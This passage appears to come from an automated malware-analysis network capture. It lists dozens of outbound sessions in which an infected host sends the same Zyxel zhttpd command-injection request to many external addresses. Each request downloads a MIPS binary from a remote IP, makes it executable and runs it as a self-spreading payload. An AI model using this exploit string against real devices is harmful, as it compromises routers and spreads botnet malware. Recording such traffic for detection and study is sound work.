                                        Jan 14, 2024 16:18:52.638221025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6436192.168.2.135578619.12.105.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.638258934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6437192.168.2.1349188164.12.95.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.638302088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6438192.168.2.1339384171.239.74.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.638358116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6439192.168.2.1355504160.168.132.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.638405085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6440192.168.2.134916037.63.228.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.638422012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6441192.168.2.1345272169.198.171.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.638468981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6442192.168.2.1346006210.251.7.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.638500929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6443192.168.2.1340420115.243.94.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.638540030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6444192.168.2.1340822185.83.128.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.638591051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6445192.168.2.1360140182.100.75.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.638619900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6446192.168.2.135246065.230.197.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.638669014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6447192.168.2.135222095.80.10.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.638710976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6448192.168.2.135122835.163.90.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.638751030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6449192.168.2.1348888168.220.177.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.638768911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6450192.168.2.1354176184.10.103.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.638823986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6451192.168.2.1358436211.231.148.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.638854027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6452192.168.2.1340068151.6.32.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.638895988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6453192.168.2.1354506165.109.9.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.638946056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6454192.168.2.1346494177.36.209.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.638988972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6455192.168.2.1353618195.47.75.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.639025927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6456192.168.2.135545859.205.155.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.639060020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6457192.168.2.134729032.173.212.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.639101982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6458192.168.2.134343818.131.125.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.639139891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6459192.168.2.134570094.27.125.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.639209032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6460192.168.2.1336040146.238.239.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.639230013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6461192.168.2.134814657.181.75.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.639297009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6462192.168.2.135798897.153.60.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.639297009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6463192.168.2.135394227.103.200.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.639338017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6464192.168.2.1334326145.150.156.89443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.639373064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6465192.168.2.1347738107.206.205.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.639435053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6466192.168.2.134857858.5.37.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.639444113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6467192.168.2.1336902176.115.93.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.639461994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6468192.168.2.1354988199.246.123.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.639493942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6469192.168.2.135174897.180.235.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.639563084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6470192.168.2.135273693.94.51.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.639600039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6471192.168.2.1346302124.163.10.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.639640093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6472192.168.2.135598492.234.42.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.639683008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6473192.168.2.1352248168.157.25.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.639695883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6474192.168.2.1353496206.234.3.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.639751911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6475192.168.2.133304240.154.248.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.639763117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6476192.168.2.134788652.53.222.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.639801025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6477192.168.2.135660034.254.246.89443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.639936924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6478192.168.2.1336782115.104.206.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.639966011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6479192.168.2.13420269.90.217.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.640000105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6480192.168.2.1349622111.40.68.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.640068054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6481192.168.2.1349732170.245.190.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.640084982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6482192.168.2.1334780169.0.38.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.640131950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6483192.168.2.1352150144.44.73.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.640206099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6484192.168.2.134814841.198.183.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.640206099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6485192.168.2.133349286.66.252.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.640234947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6486192.168.2.134611223.186.67.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.640239954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6487192.168.2.133548885.199.55.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.640333891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6488192.168.2.1354538126.135.221.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.640393972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6489192.168.2.1359966147.217.174.202443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.640398979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6490192.168.2.1339392153.114.32.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.640403032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6491192.168.2.1337082186.91.50.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.640481949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6492192.168.2.1344752148.118.249.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.640500069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6493192.168.2.1350550192.205.183.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.640537024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6494192.168.2.134133058.6.127.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.640599966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6495192.168.2.134582292.218.204.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.640624046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6496192.168.2.1339288199.241.3.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.640655994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6497192.168.2.133690047.128.72.185443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.640686035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6498192.168.2.13449765.16.131.240443
                                        TimestampBytes transferredDirectionData
